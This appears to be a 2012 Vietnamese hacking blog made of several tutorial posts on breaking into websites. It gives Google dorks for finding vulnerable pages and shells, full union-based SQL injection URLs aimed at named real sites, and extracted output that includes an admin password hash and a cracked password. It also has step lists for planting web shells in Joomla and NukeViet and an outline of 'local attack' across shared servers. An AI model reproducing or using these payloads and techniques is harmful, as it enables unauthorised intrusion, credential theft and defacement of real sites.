Thứ Năm, 31 tháng 5, 2012

[Bug] WebX (showsubpage.asp) SQLI

1. Google dork:   

inurl:"showsubpage.asp" "Powered By: WebX" 


2. Khai thác


-  Thêm Query 

null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
 
  vào sau  http://www.victim.com/showsubpage.asp?subid=
 

- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin

Ví dụ: 

http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
 

 
-  Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google

Thứ Bảy, 31 tháng 3, 2012

Up Shell Voi NuKeViet





Bước 1: Đăng nhập với quyền quản trị  

 





Chủ Nhật, 18 tháng 3, 2012

[Bài 3 - SQLI] - Khai Thác Đối Với ASPX




Bước 1: Check link lỗi


Đối với site aspx, ta thêm dấu  ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi: 

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.
Ví dụ:     http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ 








Kỹ Thuật Upshell Đối Với Joomla P.II



Bài trước soleil đã đề cập cách thức upload shell đối với joomla qua thư mục upload ảnh.
 http://ducdung08clc.blogspot.com/2012/02/ky-thuat-upshell-oi-voi-joomla.html

  Tuy nhiên một số site bị cấm quyền upload hoặc bị chặn bởi file .htacess làm cho shell không chạy được hay  một số lý do nào khác.

Trong tut này soleil sẽ demo phương pháp upload shell bằng cách edit 1 file trong themes của joomla rồi thay thế bằng code shell.


Bước 1: Login với quyền admintrator:

username: admin       pass: soleil

Bước 2: Vào phần quản lý giao diện


Vào tap “Phần Mở Rộng”     =>   “Quản lý giao diện”.
Hoặc vào theo path mặc định của joomla:  administrator/index.php?option=com_templates


Thứ Hai, 12 tháng 3, 2012

Site nước ngoài Lỗi SQLI - Phần II



Thứ Bảy, 10 tháng 3, 2012

[Bài 2 - SQLI] - Khai Thác Lỗi Cơ Bản



Bước 1: Check lỗi:  

Thêm dấu sau đường link có dạng id=
Nếu giao diện website có  thay đổi. Chứng tỏ site bị lỗi.

Bước 2: Tìm số trường cột

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 1-- -   -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 15-- - ->  Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 16-- -  -> Giao diện website thay đổi.

      Số trường  cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421 thì mới xuất hiện ra các con số đẹp.





Chúng ta chú ý sẽ thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.


Bước 4: Xuất ra tên các tables trong database

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

Thông tin về tên các table thu được:

tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor 



Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user).  Vì vậy soleil sẽ khai thác ở table này.

Bước 5: Xuất ra tên các colums chứa username và password


http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -
     Lưu ý:   
-          0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
-          74626c5f75736572 là chữ tbl_user ở dạng hex.
-          Link convert các ký tự sang mã hex:

Thông tin về tên columns thu được:

id,uid,pwd         
                
Bước 6: Xuất ra thông tin về Username và Password

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -

0x2f

Thông tin về username và password được mã hóa md5 thu được:
admin/679115597bf9f763506dcc9a8e9e8e82          

       

Bước 7:  Crack Password và tìm link admin:

-          Có nhiều site để crack passwd, ví dụ:
Hoặc sử dụng google để tìm kiếm
               
-          Sử dụng các tool để tìm link admin: Havij, Web admin finder
Pass dải nén: ducdung.08clc

Thông tin Soleil thu được:
Username và password:   admin /  961980dt


Thứ Hai, 27 tháng 2, 2012

Demo IIS Exploit



IIS Hacking là kỹ thuật hack website dễ nhất bằng cách upload shell lên hệ thống website. Hiện nay người dùng chủ yếu sử dụng hệ điều hành win 7, Vì vậy soleil sẽ chỉ demo IIS hacking trên win 7.


Bước 1: Vào My Computer, click chuột phải và chọn Add a network Location



Chọn Next



Thứ Năm, 23 tháng 2, 2012

[Bài 1 - Local Attack ] Giới Thiệu Về Local Attack




    1-      Local Attack Là gi ?

Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công vào một website có bảo mật kém chung server  với website mục tiêu. Sau đó tấn công sang website mục tiêu bằng kỹ thuật Local.


 2-      Các bước thực hiện trong local attack

-          Xác định các website chung server với site mục tiêu.
-          Check qua toàn bộ server, xác định site có bảo mật kém có thể tấn công bằng các hình thức:
SQLI, RLI, LFI, XSS, DNN, IIS, Bugs, padding orale….
-          Up shell lên website có bảo mật kém
-          Local sang Site mục tiêu


Thứ Ba, 21 tháng 2, 2012

Dork Tìm Kiếm Shell Trên Google




Với công cụ tìm kiếm google soleil có thể tìm thấy một số lượng shell lớn trên các site đã được hacker nào đó upload lên từ trước qua một số Dork như:

"Index of /sh3llZ"
"/sh3llZ/uploadshell/uploadshell.php"
intitle:index of/sh3llZ 



Thứ Bảy, 18 tháng 2, 2012

Một Số Bug - Dork Upload Shell



I  -  TailoredWeb SheLL Upload Vulnerability 
 
           
     1-      Google Dork : 

    "inurl:simple-upload-53.php"

     2-    Chọn victim, sẽ có link như sau:

OR

Ví dụ: